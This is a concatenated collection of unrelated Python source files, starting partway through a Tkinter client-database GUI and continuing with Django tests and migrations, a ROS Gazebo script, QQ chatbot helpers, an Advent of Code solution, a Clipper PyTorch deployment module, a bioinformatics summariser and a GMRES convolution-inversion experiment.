nome_uf = str(self.__db.select("UF",
["nome_uf"],
["id_uf"],
[id_uf_municipio])[0]["nome_uf"])
tmp.append(nome_uf)
return tmp
def __numero_telefone_query(self):
id_list = self.__general_client_query('id_cliente')
tmp = []
for ident in id_list:
table = self.__db.select("TELEFONE",
["ddd_telefone", "numero_telefone"],
["id_cliente_telefone"],
[str(ident)])
tmp.append(self.__format_result("numero_telefone", table))
return tmp
def __ncel_cliente_query(self):
ddd = self.__general_client_query('ddd_cel_cliente')
ncel = self.__general_client_query('ncel_cliente')
tmp = []
for i in range(len(ddd)):
full = str(ddd[i]) + str(ncel[i])
tmp.append(full)
return tmp
def __process_pag_number(self):
pag_number = math.ceil(len(self.__table_cliente[0])/20)
tmp = []
for i in range(pag_number):
tmp.append(i)
self.__combo_pagina['values'] = tmp
self.__combo_pagina.current(0)
def filter_client(self):
for i in self.__tree.get_children():
self.__tree.delete(i)
self.__tree.heading(1, text=self.__combo_campo_1.get())
self.__tree.heading(2, text=self.__combo_campo_2.get())
self.__tree.heading(3, text=self.__combo_campo_3.get())
self.__tree.heading(4, text=self.__combo_campo_4.get())
self.__campo_db = ["id_cliente"]
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_1.get()))
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_2.get()))
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_3.get()))
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_4.get()))
self.__table_cliente = []
for campo in self.__campo_db:
if campo == "nome_uf":
self.__table_cliente.append(self.__nome_uf_query())
continue
elif campo == "nome_municipio":
self.__table_cliente.append(self.__nome_municipio_query())
continue
elif campo == "numero_telefone":
self.__table_cliente.append(self.__numero_telefone_query())
continue
elif campo == "ncel_cliente":
self.__table_cliente.append(self.__ncel_cliente_query())
continue
self.__table_cliente.append(self.__general_client_query(campo))
self.__process_pag_number()
if len(self.__table_cliente[0]) == 0:
self.__tree.insert('', 'end', values=[
"Sem resultados.",
"", "", ""])
self.__button_consultar["state"] = "disabled"
self.__button_editar["state"] = "disabled"
self.__button_deletar["state"] = "disabled"
child_id = self.__tree.get_children()[0]
self.__tree.focus(child_id)
self.__tree.selection_set(child_id)
return
self.__button_consultar["state"] = "normal"
self.__button_editar["state"] = "normal"
self.__button_deletar["state"] = "normal"
child_id = self.__tree.get_children()[0]
self.__tree.focus(child_id)
self.__tree.selection_set(child_id)
def __change_pagina(self, *args):
for i in self.__tree.get_children():
self.__tree.delete(i)
values = ["", "", "", ""]
actual_index = int(self.__combo_pagina.get())*20
consult_size = len(self.__table_cliente[0])
if actual_index + 20 > consult_size:
final_index = consult_size
else:
final_index = actual_index + 20
for i in range(actual_index, final_index):
values[0] = self.__table_cliente[1][i]
values[1] = self.__table_cliente[2][i]
values[2] = self.__table_cliente[3][i]
values[3] = self.__table_cliente[4][i]
self.__tree.insert('', 'end', values=values)
return
def __get_client_id(self):
selection = self.__tree.index(self.__tree.selection())
return self.__table_cliente[0][selection+(20*int(self.__combo_pagina.get()))]
def __insert_client(self):
instance_insert = ClientInsert(self.__db, self)
self.filter_client()
def __edit_client(self):
instance_edit = ClientEdit(self.__db, self.__get_client_id(), self)
self.filter_client()
def __view_client(self):
instance_view = ClientView(self.__db, self.__get_client_id(), self)
self.filter_client()
def __delete_client(self):
if messagebox.askyesno("Questão", "Deseja excluir?"):
selected_id = str(self.__get_client_id())
self.__db.delete("TELEFONE",
["id_cliente_telefone"], [selected_id])
self.__db.delete("CLIENTE",
["id_cliente"], [selected_id])
self.filter_client()
|
python
|
# coding=utf-8
from django.test import TestCase
from django.test.utils import override_settings
class SlugFieldTest(TestCase):
def test_slugfield_allow_unicode_kwargs_precedence(self):
from wshop.models.fields.slugfield import SlugField
with override_settings(WSHOP_SLUG_ALLOW_UNICODE=True):
slug_field = SlugField(allow_unicode=False)
self.assertFalse(slug_field.allow_unicode)
slug_field = SlugField()
self.assertTrue(slug_field.allow_unicode)
|
python
|
#!/usr/bin/env python
"""Use to reset pose of model for simulation."""
import rospy
from gazebo_msgs.msg import ModelState
def set_object(name, pos, ori):
msg = ModelState()
msg.model_name = name
msg.pose.position.x = pos[0]
msg.pose.position.y = pos[1]
msg.pose.position.z = pos[2]
msg.pose.orientation.w = ori[0]
msg.pose.orientation.x = ori[1]
msg.pose.orientation.y = ori[2]
msg.pose.orientation.z = ori[3]
msg.reference_frame = 'world'
set_mode_pub.publish(msg)
print msg
if __name__ == '__main__':
rospy.init_node('set_obj')
print("set_link_state")
set_mode_pub = rospy.Publisher(
'/gazebo/set_model_state',
ModelState,
queue_size=1,
latch=True
)
names = ('lunchbox1', 'lunchbox2', 'lunchbox3', 'lunchbox4',
'drink1', 'drink2', 'drink3', 'drink4',
'riceball1', 'riceball2', 'riceball3', 'riceball4')
pos = ((-0.492, -0.16, 0.7),
(-0.492, -0.16, 0.75),
(-0.492, 0.16, 0.7),
(-0.492, 0.16, 0.75),
(-0.26, 0.11, 0.76),
(-0.36, 0.11, 0.76),
(-0.26, 0.21, 0.76),
(-0.36, 0.21, 0.76),
(-0.235, -0.2, 0.7),
(-0.33, -0.2, 0.7),
(-0.235, -0.1, 0.7),
(-0.33, -0.1, 0.7))
ori = ((0, 0, 0, 1),
(0, 0, 0, 1),
(0, 0, 0, 1),
(0, 0, 0, 1),
(0, 0, 0, 0),
(0, 0, 0, 0),
(0, 0, 0, 0),
(0, 0, 0, 0),
(0, -1, 0, 1),
(0, -1, 0, 1),
(0, -1, 0, 1),
(0, -1, 0, 1))
for i, name in enumerate(names):
set_object(name, pos[i], ori[i])
rospy.sleep(0.1)
|
python
|
# pylint: disable=W0212
# type: ignore
"""深度封装Action方法
函数只能在群消息和好友消息接收函数中调用
"""
import sys
from .action import Action
from .collection import MsgTypes
from .exceptions import InvalidContextError
from .model import FriendMsg, GroupMsg
from .utils import file_to_base64
def Text(text: str, at=False):
"""发送文字
:param text: 文字内容
:param at:是否艾特发送该消息的用户
"""
text = str(text)
# 查找消息上下文 `ctx`变量
ctx = None
f = sys._getframe()
upper = f.f_back
upper_locals = upper.f_locals
if "ctx" in upper_locals and isinstance(upper_locals["ctx"], (FriendMsg, GroupMsg)):
ctx = upper_locals["ctx"]
else:
for v in upper_locals.values():
if isinstance(v, (GroupMsg, FriendMsg)):
ctx = v
break
if ctx is None:
raise InvalidContextError("仅支持群消息和好友消息接收函数内调用")
if hasattr(ctx, "_host") and hasattr(ctx, "_port"):
action = Action(ctx.CurrentQQ, port=ctx._port, host=ctx._host)
else:
action = Action(ctx.CurrentQQ)
if isinstance(ctx, GroupMsg):
return action.sendGroupText(
ctx.FromGroupId, text, atUser=ctx.FromUserId if at else 0
)
if isinstance(ctx, FriendMsg):
if ctx.TempUin: # 私聊消息
return action.sendPrivateText(ctx.FromUin, ctx.TempUin, text)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return action.sendPhoneText(text)
else:
return action.sendFriendText(ctx.FromUin, text)
return None
def Picture(pic_url="", pic_base64="", pic_path="", pic_md5="", text=""):
"""发送图片 经支持群消息和好友消息接收函数内调用
:param pic_url: 图片链接
:param pic_base64: 图片base64编码
:param pic_path: 图片文件路径
:param pic_md5: 已发送图片的MD5, 如果是发给群聊,可以传入图片MD5列表
:param text: 包含的文字消息
``pic_url, pic_base64, pic_path必须给定一项``
"""
assert any([pic_url, pic_base64, pic_path, pic_md5]), "必须给定一项"
ctx = None
f = sys._getframe()
upper = f.f_back
upper_locals = upper.f_locals
if "ctx" in upper_locals and isinstance(upper_locals["ctx"], (FriendMsg, GroupMsg)):
ctx = upper_locals["ctx"]
else:
for v in upper_locals.values():
if isinstance(v, (FriendMsg, GroupMsg)):
ctx = v
break
if ctx is None:
raise InvalidContextError("仅支持群消息和好友消息接收函数内调用")
if hasattr(ctx, "_host") and hasattr(ctx, "_port"):
action = Action(ctx.CurrentQQ, port=ctx._port, host=ctx._host)
else:
action = Action(ctx.CurrentQQ)
if isinstance(ctx, GroupMsg):
if pic_url:
return action.sendGroupPic(ctx.FromGroupId, content=text, picUrl=pic_url)
elif pic_base64:
return action.sendGroupPic(
ctx.FromGroupId, content=text, picBase64Buf=pic_base64
)
elif pic_path:
return action.sendGroupPic(
ctx.FromGroupId, content=text, picBase64Buf=file_to_base64(pic_path)
)
elif pic_md5:
return action.sendGroupPic(ctx.FromGroupId, content=text, picMd5s=pic_md5)
if isinstance(ctx, FriendMsg):
if pic_url:
if ctx.TempUin is not None:
return action.sendPrivatePic(
ctx.FromUin, ctx.TempUin, content=text, picUrl=pic_url
)
else:
return action.sendFriendPic(ctx.FromUin, picUrl=pic_url, content=text)
elif pic_base64:
if ctx.TempUin:
return action.sendPrivatePic(
ctx.FromUin, ctx.TempUin, content=text, picBase64Buf=pic_base64
)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return None
else:
return action.sendFriendPic(
ctx.FromUin, picBase64Buf=pic_base64, content=text
)
elif pic_path:
if ctx.TempUin:
return action.sendPrivatePic(
ctx.FromUin,
ctx.TempUin,
content=text,
picBase64Buf=file_to_base64(pic_path),
)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return None
else:
return action.sendFriendPic(
ctx.FromUin, picBase64Buf=file_to_base64(pic_path), content=text
)
elif pic_md5:
if ctx.TempUin:
return action.sendPrivatePic(
ctx.FromUin, ctx.TempUin, content=text, fileMd5=pic_md5
)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return None
else:
return action.sendFriendPic(ctx.FromUin, fileMd5=pic_md5, content=text)
return None
def Voice(voice_url="", voice_base64="", voice_path=""):
"""发送语音 经支持群消息和好友消息接收函数内调用
:param voice_url: 语音链接
:param voice_base64: 语音base64编码
:param voice_path: 语音文件路径
voice_url, voice_base64, voice_path必须给定一项
"""
assert any([voice_url, voice_base64, voice_path]), "必须给定一项"
ctx = None
f = sys._getframe()
upper = f.f_back
upper_locals = upper.f_locals
if "ctx" in upper_locals and isinstance(upper_locals["ctx"], (FriendMsg, GroupMsg)):
ctx = upper_locals["ctx"]
else:
for v in upper_locals.values():
if isinstance(v, (GroupMsg, FriendMsg)):
ctx = v
break
if ctx is None:
raise InvalidContextError("仅支持群消息和好友消息接收函数内调用")
if hasattr(ctx, "_host") and hasattr(ctx, "_port"):
action = Action(ctx.CurrentQQ, port=ctx._port, host=ctx._host)
else:
action = Action(ctx.CurrentQQ)
if isinstance(ctx, GroupMsg):
if voice_url:
return action.sendGroupVoice(ctx.FromGroupId, voiceUrl=voice_url)
elif voice_base64:
return action.sendGroupVoice(ctx.FromGroupId, voiceBase64Buf=voice_base64)
elif voice_path:
return action.sendGroupVoice(
ctx.FromGroupId, voiceBase64Buf=file_to_base64(voice_path)
)
if isinstance(ctx, FriendMsg):
if voice_url:
if ctx.TempUin:
return action.sendPrivateVoice(
ctx.FromUin, ctx.TempUin, voiceUrl=voice_url
)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return None
else:
return action.sendFriendVoice(ctx.FromUin, voiceUrl=voice_url)
elif voice_base64:
if ctx.TempUin:
return action.sendPrivateVoice(
ctx.FromUin, ctx.TempUin, voiceBase64Buf=voice_base64
)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return None
else:
return action.sendFriendVoice(ctx.FromUin, voiceBase64Buf=voice_base64)
elif voice_path:
if ctx.TempUin:
return action.sendPrivateVoice(
ctx.FromUin, ctx.TempUin, voiceBase64Buf=file_to_base64(voice_path)
)
elif ctx.MsgType == MsgTypes.PhoneMsg: # 来自手机的消息
return None
else:
return action.sendFriendVoice(
ctx.FromUin, voiceBase64Buf=file_to_base64(voice_path)
)
return None
|
python
|
# coding:utf-8
# --author-- binglu.wang
import zfused_api
import zfused_maya.core.record as record
def get_assets():
_assets = {}
_project_id = record.current_project_id()
_project_assets = zfused_api.asset.project_assets([_project_id])
# print _project_assets
for _asset in _project_assets:
asset = zfused_api.asset.Asset(_asset["Id"])
_assets[asset.code()] =asset.production_path()
return _assets
|
python
|
INPUTPATH = "input.txt"
#INPUTPATH = "input-test.txt"
with open(INPUTPATH) as ifile:
filetext = ifile.read()
data = [chunk for chunk in filetext.strip().split("\n\n")]
from typing import Tuple
IntervalPair = Tuple[int, int, int, int]
def parse_rule(line: str) -> Tuple[str, IntervalPair]:
field, right = line.split(": ")
a, b, c, d = (int(z) for p in right.split("or") for z in p.split("-"))
return field, (a, b, c, d)
def within(z: int, ip: IntervalPair) -> bool:
return ip[0] <= z <= ip[1] or ip[2] <= z <= ip[3]
rules = dict(map(parse_rule, data[0].split("\n")))
mine = list(map(int, data[1].split("\n")[1].split(",")))
nearby = [list(map(int, line.split(","))) for line in data[2].split("\n")[1:]]
print(sum(
value for ticket in nearby for value in ticket
if all(not within(value, ip) for ip in rules.values())
))
valids = [
ticket.copy() for ticket in nearby
if all(
any(within(value, ip) for ip in rules.values())
for value in ticket
)
]
field_to_indices = dict(
(field, set(
i for i in range(len(rules))
if all(within(ticket[i], ip) for ticket in valids)
))
for field, ip in rules.items()
)
solved = set()
while any(len(indices) > 1 for indices in field_to_indices.values()):
for indices in field_to_indices.values():
if len(indices) == 1:
solved.add(next(iter(indices)))
else:
indices -= solved
from collections import defaultdict
index_to_field = defaultdict(str, (
(next(iter(indices)) if indices else -1, field)
for field, indices in field_to_indices.items()
))
from math import prod
print(prod(
value for i, value in enumerate(mine)
if index_to_field[i].startswith("departure")
))
|
python
|
from __future__ import print_function, with_statement, absolute_import
import shutil
import torch
import logging
import os
from warnings import warn
from ..version import __version__
from .deployer_utils import save_python_function
logger = logging.getLogger(__name__)
def create_pytorch_endpoint(clipper_conn,
name,
input_type,
inputs,
func,
pytorch_model,
default_output="None",
version=1,
slo_micros=3000000,
labels=None,
registry=None,
base_image=None,
num_replicas=1,
onnx_backend="caffe2",
batch_size=-1,
pkgs_to_install=None):
"""This function deploys the prediction function with a PyTorch model.
It serializes the PyTorch model in Onnx format and creates a container that loads it as a
Caffe2 model.
Parameters
----------
clipper_conn : :py:meth:`clipper_admin.ClipperConnection`
A ``ClipperConnection`` object connected to a running Clipper cluster.
name : str
The name to be assigned to both the registered application and deployed model.
input_type : str
The input_type to be associated with the registered app and deployed model.
One of "integers", "floats", "doubles", "bytes", or "strings".
inputs :
input of func.
func : function
The prediction function. Any state associated with the function will be
captured via closure capture and pickled with Cloudpickle.
pytorch_model : pytorch model object
The PyTorch model to save.
default_output : str, optional
The default output for the application. The default output will be returned whenever
an application is unable to receive a response from a model within the specified
query latency SLO (service level objective). The reason the default output was returned
is always provided as part of the prediction response object. Defaults to "None".
version : str, optional
The version to assign this model. Versions must be unique on a per-model
basis, but may be re-used across different models.
slo_micros : int, optional
The query latency objective for the application in microseconds.
This is the processing latency between Clipper receiving a request
and sending a response. It does not account for network latencies
before a request is received or after a response is sent.
If Clipper cannot process a query within the latency objective,
the default output is returned. Therefore, it is recommended that
the SLO not be set aggressively low unless absolutely necessary.
100000 (100ms) is a good starting value, but the optimal latency objective
will vary depending on the application.
labels : list(str), optional
A list of strings annotating the model. These are ignored by Clipper
and used purely for user annotations.
registry : str, optional
The Docker container registry to push the freshly built model to. Note
that if you are running Clipper on Kubernetes, this registry must be accesible
to the Kubernetes cluster in order to fetch the container from the registry.
base_image : str, optional
The base Docker image to build the new model image from. This
image should contain all code necessary to run a Clipper model
container RPC client.
num_replicas : int, optional
The number of replicas of the model to create. The number of replicas
for a model can be changed at any time with
:py:meth:`clipper.ClipperConnection.set_num_replicas`.
onnx_backend : str, optional
The provided onnx backend.Caffe2 is the only currently supported ONNX backend.
batch_size : int, optional
The user-defined query batch size for the model. Replicas of the model will attempt
to process at most `batch_size` queries simultaneously. They may process smaller
batches if `batch_size` queries are not immediately available.
If the default value of -1 is used, Clipper will adaptively calculate the batch size for
individual replicas of this model.
pkgs_to_install : list (of strings), optional
A list of the names of packages to install, using pip, in the container.
The names must be strings.
"""
clipper_conn.register_application(name, input_type, default_output,
slo_micros)
deploy_pytorch_model(clipper_conn, name, version, input_type, inputs, func,
pytorch_model, base_image, labels, registry,
num_replicas, onnx_backend, batch_size,
pkgs_to_install)
clipper_conn.link_model_to_app(name, name)
def deploy_pytorch_model(clipper_conn,
name,
version,
input_type,
inputs,
func,
pytorch_model,
base_image=None,
labels=None,
registry=None,
num_replicas=1,
onnx_backend="caffe2",
batch_size=-1,
pkgs_to_install=None):
"""This function deploys the prediction function with a PyTorch model.
It serializes the PyTorch model in Onnx format and creates a container that loads it as a
Caffe2 model.
Parameters
----------
clipper_conn : :py:meth:`clipper_admin.ClipperConnection`
A ``ClipperConnection`` object connected to a running Clipper cluster.
name : str
The name to be assigned to both the registered application and deployed model.
version : str
The version to assign this model. Versions must be unique on a per-model
basis, but may be re-used across different models.
input_type : str
The input_type to be associated with the registered app and deployed model.
One of "integers", "floats", "doubles", "bytes", or "strings".
inputs :
input of func.
func : function
The prediction function. Any state associated with the function will be
captured via closure capture and pickled with Cloudpickle.
pytorch_model : pytorch model object
The Pytorch model to save.
base_image : str, optional
The base Docker image to build the new model image from. This
image should contain all code necessary to run a Clipper model
container RPC client.
labels : list(str), optional
A list of strings annotating the model. These are ignored by Clipper
and used purely for user annotations.
registry : str, optional
The Docker container registry to push the freshly built model to. Note
that if you are running Clipper on Kubernetes, this registry must be accesible
to the Kubernetes cluster in order to fetch the container from the registry.
num_replicas : int, optional
The number of replicas of the model to create. The number of replicas
for a model can be changed at any time with
:py:meth:`clipper.ClipperConnection.set_num_replicas`.
onnx_backend : str, optional
The provided onnx backend.Caffe2 is the only currently supported ONNX backend.
batch_size : int, optional
The user-defined query batch size for the model. Replicas of the model will attempt
to process at most `batch_size` queries simultaneously. They may process smaller
batches if `batch_size` queries are not immediately available.
If the default value of -1 is used, Clipper will adaptively calculate the batch size for
individual replicas of this model.
pkgs_to_install : list (of strings), optional
A list of the names of packages to install, using pip, in the container.
The names must be strings.
"""
warn("""
The caffe 2 version is not up to date because
https://github.com/ucbrise/clipper/issues/475,
however you may still be able use it.
We will update our caffe2 build soon.""")
if base_image is None:
if onnx_backend is "caffe2":
base_image = "clipper/caffe2-onnx-container:{}".format(__version__)
else:
logger.error(
"{backend} ONNX backend is not currently supported.".format(
backend=onnx_backend))
serialization_dir = save_python_function(name, func)
try:
torch.onnx._export(
pytorch_model,
inputs,
os.path.join(serialization_dir, "model.onnx"),
export_params=True)
# Deploy model
clipper_conn.build_and_deploy_model(
name, version, input_type, serialization_dir, base_image, labels,
registry, num_replicas, batch_size, pkgs_to_install)
except Exception as e:
logger.error(
"Error serializing PyTorch model to ONNX: {e}".format(e=e))
logger.info("Torch model has be serialized to ONNX format")
# Remove temp files
shutil.rmtree(serialization_dir)
|
python
|
# Generated by Django 3.1.5 on 2021-02-09 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DJIAIndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=150, unique=True)),
('exchange', models.CharField(max_length=15)),
('symbol', models.CharField(max_length=10, unique=True)),
('industry', models.CharField(max_length=150)),
('date_added', models.DateTimeField()),
('notes', models.CharField(max_length=200, null=True)),
('weighting', models.CharField(max_length=20, null=True)),
],
options={
'verbose_name_plural': 'DJIA Market Index Composition',
},
),
migrations.CreateModel(
name='FTSE100IndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=150, unique=True)),
('symbol', models.CharField(max_length=10, unique=True)),
('industry', models.CharField(max_length=200)),
],
options={
'verbose_name_plural': 'FTSE 100 Market Index Composition',
},
),
migrations.CreateModel(
name='SMIComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rank', models.IntegerField()),
('company', models.CharField(max_length=100, unique=True)),
('industry', models.CharField(max_length=100)),
('symbol', models.CharField(max_length=10, unique=True)),
('canton', models.CharField(max_length=100)),
('weighting', models.CharField(max_length=20)),
],
options={
'verbose_name_plural': 'Swiss Market Index Composition',
},
),
migrations.CreateModel(
name='SPIComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=10, unique=True)),
('company', models.CharField(max_length=100)),
('smi_family', models.CharField(max_length=100, null=True)),
('date_added', models.CharField(max_length=10, null=True)),
('notes', models.CharField(max_length=200, null=True)),
],
options={
'verbose_name_plural': 'Swiss Performance Index Composition',
},
),
migrations.CreateModel(
name='SPTSXIndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=20, unique=True)),
('company', models.CharField(max_length=200)),
('sector', models.CharField(max_length=100)),
('industry', models.CharField(max_length=200)),
],
options={
'verbose_name_plural': 'S&P/TSX Market Index Composition',
},
),
migrations.CreateModel(
name='SPYIndexComposition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symbol', models.CharField(max_length=10, unique=True)),
('security_name', models.CharField(max_length=100, unique=True)),
('gics_sector', models.CharField(max_length=100, null=True)),
('gics_sub_industry', models.CharField(max_length=100, null=True)),
('headquarters_location', models.CharField(max_length=100, null=True)),
('date_added', models.CharField(max_length=25, null=True)),
('cik', models.IntegerField(unique=True)),
('founded', models.CharField(max_length=50)),
],
options={
'verbose_name_plural': 'SPY Market Index Composition',
},
),
]
|
python
|
import glob
import os
from Bio import SeqIO
from Bio.Seq import Seq
output_dir_merge = '/scratch/users/anniz44/genomes/donor_species/vcf_round2/merge/details'
genus_cutoff = 3 # >= 3 genera as core
allgenome = output_dir_merge + '/summary/all.genome.gene.faa'
allgenome_denovo = output_dir_merge + '/summary/all.denovo.gene.faa'
allgenome_HS = output_dir_merge + '/summary/all.selected.gene.faa'
def genus_list(species_list):
return set([i.replace('BL','BiLo').replace('BA','BiAd')[0:2] for i in species_list])
def function_species(fastaname):
species_file = fastaname + '.uc.species.sum'
eggnog_file = fastaname + '.cluster.aa.all.eggnog.sum'
kegg_file = fastaname + '.cluster.aa.all.kegg.sum'
Species_fun = dict()
for lines in open(species_file, 'r'):
line_set = lines.split('\n')[0].split('\t')
record_name = line_set[0]
species_num = line_set[1]
species_name = line_set[2].split(',')
tag_genus = 'False'
if len(species_name) > 1:
genus = genus_list(species_name)
if len(genus) >= genus_cutoff:
tag_genus = 'True'
Species_fun.setdefault(record_name, [species_num,tag_genus])
Output = []
for lines in open(eggnog_file, 'r'):
line_set = lines.split('\n')[0].split('\t')
if lines.startswith('cluster'):
Output.append('\t'.join(line_set) + '\tspecies_num\tcross_genus\n')
else:
if line_set[6] == '':
line_set.pop(6)
record_name = line_set[4]
if record_name in Species_fun:
species_num, tag_genus = Species_fun[record_name]
else:
species_num, tag_genus = [1,'False']
Output.append('\t'.join(line_set) + '\t%s\t%s\n'%(species_num, tag_genus))
f1 = open(fastaname + '.cluster.aa.all.eggnog.sum.species.sum', 'w')
f1.write(''.join(Output))
f1.close()
Output = []
for lines in open(kegg_file, 'r'):
line_set = lines.split('\n')[0].split('\t')
if lines.startswith('cluster'):
Output.append('\t'.join(line_set) + '\tspecies_num\tcross_genus\n')
else:
if line_set[6] == '':
line_set.pop(6)
record_name = line_set[4]
if record_name in Species_fun:
species_num, tag_genus = Species_fun[record_name]
else:
species_num, tag_genus = [1,'False']
Output.append('\t'.join(line_set) + '\t%s\t%s\n'%(species_num, tag_genus))
f1 = open(fastaname + '.cluster.aa.all.kegg.sum.species.sum', 'w')
f1.write(''.join(Output))
f1.close()
function_species(allgenome_HS)
function_species(allgenome_denovo)
function_species(allgenome)
# split HS annotation within lineage and across lineages
def HS_lineage(filename,HS_lineagefasta):
HS_lineage_set = set()
for record in SeqIO.parse(HS_lineagefasta, 'fasta'):
record_id = str(record.id)
HS_lineage_set.add(record_id)
Output_within = set()
Output_across = set()
for lines in open(filename,'r'):
if lines.split('\t')[4] in HS_lineage_set:
Output_within.add(lines)
else:
Output_across.add(lines)
f1 = open(filename + '.within.sum', 'w')
f1.write(''.join(list(Output_within)))
f1.close()
f1 = open(filename + '.across.sum', 'w')
f1.write(''.join(list(Output_across)))
f1.close()
#HS_annotation_sum = output_dir_merge + '/summary/all.selected.gene.faa.cluster.aa.all.eggnog.sum.species.sum'
#allgenome_HS_lineage = output_dir_merge + '/summary/all.selected.gene.faa'
#HS_lineage(HS_annotation_sum,allgenome_HS_lineage)
|
python
|
from __future__ import print_function
import numpy as np
from scipy.sparse.linalg import gmres
import scipy.sparse.linalg as spla
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import torch.backends.cudnn as cudnn
import os
import argparse
from tqdm import tqdm
class twoModule(nn.Module):
def __init__(self, KERNEL_SIZE=3, channels=3):
super(twoModule, self).__init__()
self.conv = nn.Conv2d(channels, channels, kernel_size=KERNEL_SIZE, stride=1, padding=int((KERNEL_SIZE-1)/2))
self.bn = nn.BatchNorm2d(channels)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
def weight(Conv, Bn):
w_conv = Conv.weight.clone().view(Conv.out_channels, -1)
w_bn = torch.diag(Bn.weight.div(torch.sqrt(Bn.eps + Bn.running_var)))
w = torch.mm(w_bn, w_conv)
return w
def bias(Conv, Bn):
if Conv.bias is not None:
b_conv = Conv.bias
else:
b_conv = torch.zeros(Conv.weight.size(0))
b_bn = Bn.bias - Bn.weight.mul((Bn.running_mean).div(torch.sqrt(Bn.eps + Bn.running_var)))
b = b_conv + b_bn
return b
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--num', '-n', default=16, type=int, help='number of input data')
parser.add_argument('--channels', '-c', default=3, type=int, help='number of channels of input data')
parser.add_argument('--height', '-hh', default=32, type=int, help='height of input data')
parser.add_argument('--width', '-w', default=32, type=int, help='width of input data')
parser.add_argument('--kernel', '-k', default=5, type=int, help='kernel size of the Conv layer')
parser.add_argument('--epoch', '-e', default=100, type=int, help='number of epochs for testing')
parser.add_argument('--batch', default=100, type=int, help='batch size for input data')
#parser.addm .._argument('--epoch_num', '-e', default=1, type=int, help='number of epochs while training')
args = parser.parse_args()
torch.set_grad_enabled(False)
#Test module for randomly generated data
kernel = args.kernel
padding = (kernel - 1) / 2 #ensure that input and output have the same dimensions
height = args.height
width = args.width
height_padding = height + padding * 2
width_padding = width + padding * 2
net = twoModule(args.kernel, args.channels)
for i in range(args.epoch):
#Usual forward calculation for random generated data
x = torch.randn(args.num, args.channels, args.height, args.width)
y = net(x)
W = weight(net.conv, net.bn)
B = bias(net.conv, net.bn)
#Prepare A
A = torch.zeros(int(args.channels * height * width), int(args.channels * height_padding * width_padding))
if args.channels == 3:
w = W.clone().view(3, 3, kernel, kernel)
for i in range(3):
for j in range(height):
for k in range(width):
row_index = int(i * height * width + j * width + k)
for m in range(3):
for n in range(kernel):
for p in range(kernel):
A[row_index][int(k + n * width_padding + m * width_padding * height_padding + p)] = w[i][m][n][p]
elif args.channels == 1:
w = W.clone().view(kernel, -1)
for j in range(height):
for k in range(width):
row_index = int(j * width + k)
for n in range(kernel):
for p in range(kernel):
A[row_index][int(k + n * width_padding + p)] = w[n][p]
Padding = torch.zeros(int(args.channels * height_padding * width_padding), int(args.channels * height * width))
for m in range(args.channels):
for i in range(height):
for j in range(width):
Padding[int(m * width_padding * height_padding + p * width_padding + i * width_padding + padding + j)][int(m * width * height + i * width + j)] = 1
AA = torch.mm(A, Padding)
#Prepare b
b = y.clone().view(-1)
for i in range(args.channels):
for j in range(height):
for k in range(width):
b[i * height * width + j * width + k] -= B[i]
if args.num != 1:
b = b.clone().view(args.num, -1)
#Solve Ax=b to solve the implicit problem
#Prepare the preconditioner
max_tensor = torch.zeros(int(args.channels * height * width))
for k in range(int(args.channels * height * width)):
if abs(torch.max(AA[k]).item()) == 0:
max_tensor[k] = 0
else:
max_tensor[k] = 1.0 / abs(torch.max(AA[k]).item())
D = torch.diag(max_tensor)
#Apply the GMRES method
X = torch.zeros(int(args.num * args.channels * height * width))
if args.num != 1:
for i in range(args.num):
z = gmres(AA.numpy(), b[i].numpy(), tol=1e-06, M=D.numpy())
for j in range(args.channels * height * width):
xx = torch.from_numpy(z[0])
X[i * args.channels * height * width + j] = xx[j]
else:
z = gmres(AA.numpy(), b.numpy(), tol=1e-06, M=D.numpy())
X = torch.from_numpy(z[0])
XX = X.clone().view(args.num, args.channels, height, width)
Y = net(XX)
d = (y - Y).norm(1).item()
dd = (y - Y).norm(2).item()
ddd = abs(torch.max(y - Y).item())
s = (y - Y).norm(1).div(y.norm(1)).item()
ss = (y - Y).norm(2).div(y.norm(2)).item()
sss = abs(torch.max(y - Y).item()) / abs(torch.max(y).item())
print("error_1: %.8f, error_2: %.8f, error_3: %.8f, error_4: %.8f, error_5: %.8f, error_6: %.8f"
% (d, dd, ddd, s, ss, sss))
with open(os.path.join('WANTED_PATH' + str(args.num) + '.txt'), 'a') as f: #you need to modify the code here to get it running
f.write(str(d))
f.write(' ')
f.write(str(dd))
f.write(' ')
f.write(str(ddd))
f.write(' ')
f.write(str(s))
f.write(' ')
f.write(str(ss))
f.write(' ')
f.write(str(sss))
f.write('\n')
################# not used ###################################################
'''
#Apply this method to solve the implicit case of CIFAR10
#preparing data from CIFAR10
print("==> preparing data...")
DOWNLOAD = False
if not (os.path.exists('./data/')) or not (os.listdir('./data/')):
DOWNLOAD = True
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
